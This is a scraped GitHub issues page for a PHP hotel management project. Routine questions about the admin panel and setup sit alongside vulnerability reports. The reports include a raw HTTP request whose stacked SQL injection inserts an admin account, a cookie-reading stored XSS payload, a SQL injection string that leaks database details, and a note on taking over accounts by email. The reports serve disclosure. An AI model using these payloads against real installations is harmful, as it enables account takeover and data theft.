tramyardg / hotel-mgmt-system Goto Github PK

Hey,
I couldn't access the admin panel, it displays an empty page
that's the link i used: http://localhost/hotel-mgmt-system/admin.php

Normalize customer table in 2NF. The new entity will be called admins along with existing customer.

Sq code

List of Vulnerable path

Vulnerable path /app/process_update_profile.php
Lines 32-37 of the "process_update_profile.php" don't differentiate the user's permissions and the status of login.

Vulnerability exploitation process:

post the data to "process_update_profile.php".Attacker only need a true user's email,then Attacker can change other's password,phone and so on.Attacker can get the account of admin.

check the database,find the differences.

POC code:

Simple approach is to put pending in the search input value. This will display all the pending rsvp.

The problem was admin credentials are exposed in admin.json. For security reason, we have to create a field in customer table to tell if the user is admin or not. Therefore, we don't need admin.json anymore for authenticating admins.

Files to modify:

• hotel.sql
• app/models/Customer.php: isAdminSignedIn

List of Vulnerable path

Vulnerable path /app/dao/BookingDetailDAO.php
Vulnerable path /app/handlers/BookingDetailHandler.php
Vulnerable path /app/admin/manage_reservation.php
Lines 54-60 of the "BookingDetailDAO.php"
The variable i is spliced into the sql statement.It causes SQL inject.

Lines 63-74 of the "BookingDetailHandler.php"
updateConfirmed is called by confirmSelection

Line 10 of the "manage_reservation.php"
$bdh->confirmSelection($_POST["item"]); we could inject through post item

Vulnerability exploitation process

read the README.md and install the project
post the poc code

POST /app/admin/manage_reservation.php HTTP/1.1
Host: localhost
Content-Length: 119
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: elefant_user=ohao1ku87687qe855jotru3o5p; PHPSESSID=19q15nrh1hinhipjeomugnaqd2
Connection: close

confirm=1&item[0]=11;INSERT INTO customer(cid,fullname,email,password,phone,isadmin) values(2,"attack","a","a","1","1")

the info insert into the table finally

Is composer necessary to run this? Any tips on how to install an older version of Php using xampp?

edit: i was able to get it.

How do i create an admin credentials?

Hello, I have an issue with booking an existing room

In the registration and sign in page, add a button or a link to go back to home page.

List of Vulnerable path

Vulnerable path /app/process_update_profile.php
Lines 32-37 of the "process_update_profile.php" file,there is no filtering,so cause Cross Site Script.

In fact,the filter was forgot.Another file has a filter . Its path /app/process_registration.php


The data is safe when user register,but it is unsafe after update.

Vulnerability exploitation process:

register a new account.


login the user and click "update profile".

input poc and submit.

The administrator will trigger it.

POC code:

<script>alert('youyou_pm10'+document.cookie);</script>

Hi
Sorry to bother, i was wondering how to access to admin panel?
i setup everything, tried /app /admin.php etc..
Thanks in advance

Any takers? Feel free. You can use the png below
favicon_package_v0.16.zip

Insert the following code in the <head> section

<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="theme-color" content="#ffffff">

How to fix it?

Simple approach is to put confirmed in the search input value. This will display all the confirmed rsvp.

How to access and use admin page even if I changed field on already registered user and entering url /admin.php I still get empy page like this

List of Vulnerable path

Vulnerable path /app/dao/CustomerDAO.php
Vulnerable path /app/handlers/CustomerHandler.php
Vulnerable path /app/process_update_profile.php
Lines 49-59 of the "CustomerDAO.php" file splice the sql word,so bypass the PDO.

Line 98 of the "CustomerHandler.php" use the vulnerable function.

Lines 31-40 of the "process_update_profile.php" use the vulnerable function.

Vulnerability exploitation process:

After the user logged in, click the button "update proflie".

Then input the poc and click "update".

After that,refresh it and click "update profile",you can see the data from database.

POC code:

youyou",password = "", phone = concat(database(),version()) WHERE `customer`.`cid`="10"#